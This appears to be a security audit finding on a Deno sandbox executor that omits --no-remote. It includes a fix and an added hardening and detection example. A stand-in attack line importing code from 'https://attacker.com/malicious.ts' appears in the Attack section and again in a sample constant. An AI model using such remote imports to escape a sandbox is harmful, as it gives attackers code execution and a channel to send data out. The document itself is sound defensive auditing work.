⚠️ HIGH SEVERITY - Sandbox Bypass
Severity: P1
Location: src/sandbox-executor.ts:249-289
CONFIRMED:
TypeScript executor never passes --no-remote to Deno, allowing remote imports:
// Deno args built WITHOUT --no-remote
const denoArgs = [
  'run',
  '--no-prompt',
  '--allow-net=localhost,...', // ← Allows localhost MCP proxy
  // MISSING: --no-remote
  wrappedCodeFile
];
Attack:
// User code can import from ANY HTTPS URL
import { exploit } from 'https://attacker.com/malicious.ts';
// Bypasses:
// - permissions.net allowlist (Deno fetches modules separately)
// - SSRF protection (only checks callMCPTool hosts)
// - Tool allowlist (remote code has full permissions)
Impact:
- Remote code execution from any HTTPS URL
- Bypasses network permission checks
- Unmonitored egress to attacker domains
- Data exfiltration channel
Fix:
const denoArgs = [
  'run',
  '--no-prompt',
  '--no-remote', // ← Block remote imports
  '--allow-net=localhost,...',
  wrappedCodeFile
];
// OR use import maps for allowed remotes:
// --import-map=import-map.json
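Added example (not the project's code): a hardened argument builder, a guard that refuses to spawn Deno when a hardening flag such as --no-remote is missing, and a pre-execution scan that logs remote import specifiers in user code. Function names and the sample snippet are assumptions.

```typescript
// Flags the sandbox must always pass. --no-remote blocks http(s):// module
// imports, which Deno would otherwise fetch itself, outside --allow-net.
// All names here are illustrative, not taken from src/sandbox-executor.ts.
const REQUIRED_FLAGS = ["--no-prompt", "--no-remote"];

export function buildDenoArgs(wrappedCodeFile: string, allowNet: string[]): string[] {
  return [
    "run",
    "--no-prompt",
    "--no-remote",                       // block remote module imports
    `--allow-net=${allowNet.join(",")}`, // only the local MCP proxy hosts
    wrappedCodeFile,
  ];
}

// Regression guard to call right before spawning Deno: a refactor that drops
// --no-remote fails loudly instead of silently reopening remote imports.
export function assertSandboxArgs(args: string[]): void {
  const missing = REQUIRED_FLAGS.filter((f) => !args.includes(f));
  if (missing.length > 0) {
    throw new Error(`sandbox args missing hardening flags: ${missing.join(" ")}`);
  }
}

// Defence in depth: find remote specifiers in user code before execution so
// the attempt is recorded even though --no-remote would already reject it.
// Heuristic: string literal after `from`, `import(` or a bare `import`.
const REMOTE_SPECIFIER = /(?:\bfrom\s*|\bimport\s*\(?\s*)["'](https?:\/\/[^"']+)["']/g;

export function findRemoteImports(source: string): string[] {
  const found: string[] = [];
  for (const m of source.matchAll(REMOTE_SPECIFIER)) {
    found.push(m[1]);
  }
  return found;
}

// Constructed sample of user code: one remote import, one local, one dynamic.
export const SAMPLE_USER_CODE = [
  "import { exploit } from 'https://attacker.com/malicious.ts';",
  "import { helper } from './local.ts';",
  "const m = await import(\"https://example.invalid/mod.ts\");",
].join("\n");
```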
References: